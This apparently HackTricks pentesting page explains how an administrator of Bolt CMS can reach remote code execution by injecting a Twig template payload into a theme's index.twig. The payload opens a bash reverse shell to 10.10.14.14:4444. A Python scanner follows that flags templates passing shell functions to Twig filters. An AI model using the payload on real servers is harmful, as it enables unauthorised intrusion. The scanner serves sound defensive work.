# Bolt CMS
{{#include ../../banners/hacktricks-training.md}}
## RCE
After logging in as administrator (visit /bot to reach the login prompt), you can obtain RCE in Bolt CMS:

- Select `Configuration` -> `View Configuration` -> `Main Configuration`, or visit the URL path `/bolt/file-edit/config?file=/bolt/config.yaml`
- Check the value of the theme
<figure><img src="../../images/image (771).png" alt=""><figcaption></figcaption></figure>
- Select `File management` -> `View & edit templates`
- Select the theme base found in the previous step (in this case `base-2021`) and choose `index.twig`
- In my case this was at the URL path /bolt/file-edit/themes?file=/base-2021/index.twig
- Set your payload in this file via [template injection (Twig)](../../pentesting-web/ssti-server-side-template-injection/index.html#twig-php), for example: `{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}`
- And save the changes
<figure><img src="../../images/image (948).png" alt=""><figcaption></figcaption></figure>
- Clear the cache via `Maintenance` -> `Clear the cache`
- Access the page again as a normal user; the payload should be executed
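The step above works because Twig's `filter` accepts a PHP function name as its callable, so anyone who can edit a theme template can run shell commands. A defender-side check for this, added here as an example and not part of the original page or of Bolt CMS, is to scan the theme directory for templates that pass a shell-executing PHP function by name into `filter`, `map`, `reduce` or `sort`. The regex, the list of flagged function names and the sample template below are constructed for the example.

```python
import re

# Constructed sample template (not from a real Bolt install): one benign
# record output, one line that hands a PHP shell function to Twig's filter().
SAMPLE_TEMPLATE = """\
{% extends 'partials/_master.twig' %}
{% block main %}
  <h1>{{ record.title }}</h1>
  {{ ['id']|filter('system') }}
  {{ record.body|raw }}
{% endblock %}
"""

# PHP functions that execute OS commands; any of these reachable from a
# template means template-edit access equals code execution.
DANGEROUS_CALLABLES = {"system", "exec", "shell_exec", "passthru", "popen", "proc_open"}

# Twig filters that take a callable argument; match a quoted PHP function
# name passed as the first argument, e.g. |filter('system').
CALLABLE_ARG_RE = re.compile(
    r"\|\s*(filter|map|reduce|sort)\s*\(\s*['\"]([A-Za-z_][A-Za-z0-9_]*)['\"]"
)


def scan_template(text):
    """Return (line_no, twig_filter, php_function, stripped_line) for each hit."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in CALLABLE_ARG_RE.finditer(line):
            php_function = m.group(2)
            if php_function in DANGEROUS_CALLABLES:
                findings.append((lineno, m.group(1), php_function, line.strip()))
    return findings


def scan_theme_dir(root):
    """Walk a theme directory and scan every .twig file (assumed layout)."""
    import pathlib
    results = {}
    for path in pathlib.Path(root).rglob("*.twig"):
        hits = scan_template(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            results[str(path)] = hits
    return results


if __name__ == "__main__":
    for lineno, twig_filter, fn, src in scan_template(SAMPLE_TEMPLATE):
        print(f"line {lineno}: {twig_filter}() called with PHP function {fn!r}: {src}")
```

Run `scan_theme_dir("/path/to/bolt/public/theme")` on a live install, or wire `scan_template` into a file-integrity check triggered by writes under the theme directory; together with logging of requests to `/bolt/file-edit/themes`, this turns the template edit in the steps above into a detectable event.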
{{#include ../../banners/hacktricks-training.md}}